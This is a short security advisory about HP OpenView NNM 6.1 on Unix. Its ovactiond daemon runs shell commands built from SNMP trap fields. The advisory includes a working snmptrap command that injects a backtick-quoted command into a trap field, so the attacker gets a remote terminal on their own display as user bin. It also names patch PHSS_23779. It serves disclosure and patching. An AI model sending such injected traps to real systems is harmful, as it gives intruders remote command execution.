openview.snmp.txt

`HP Openview NNM6.1 and earlier running on unix   
have a problem with the suid bin executable   
ovactiond. It allows for starting of any program by just   
sending a trap or event to the station running the   
daemon.  
  
Details:  
in the trapd.conf the following is defined by default   
(NNM6.1):  
#  
EVENT   
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000  
0208 "Configuration Alarms" Warning  
FORMAT Generic NNM to MgX message. $12  
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1   
$10 1.3.[snip...]  
#  
  
by sending this trap:  
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1   
1.2.3.4 6 60000208 0 1 s "" 2 s "" 3   
s "\`/usr/bin/X11/hpterm -display <your client   
display>\`" 4 s "" [snip...] 12 s ""  
  
You get an hpterm on your client display running   
under user bin on the NNM server.  
  
The reason is that NNM first completes the command   
under the EXEC and then starts that in a shell.  
  
Path:  
the patch to install is PHSS_23779 and is default in   
all newest patch releases of NNM. This patch checks   
for 'strange' characters in the input strings received   
through the event or trap.  
  
MAG,  
Milo  
`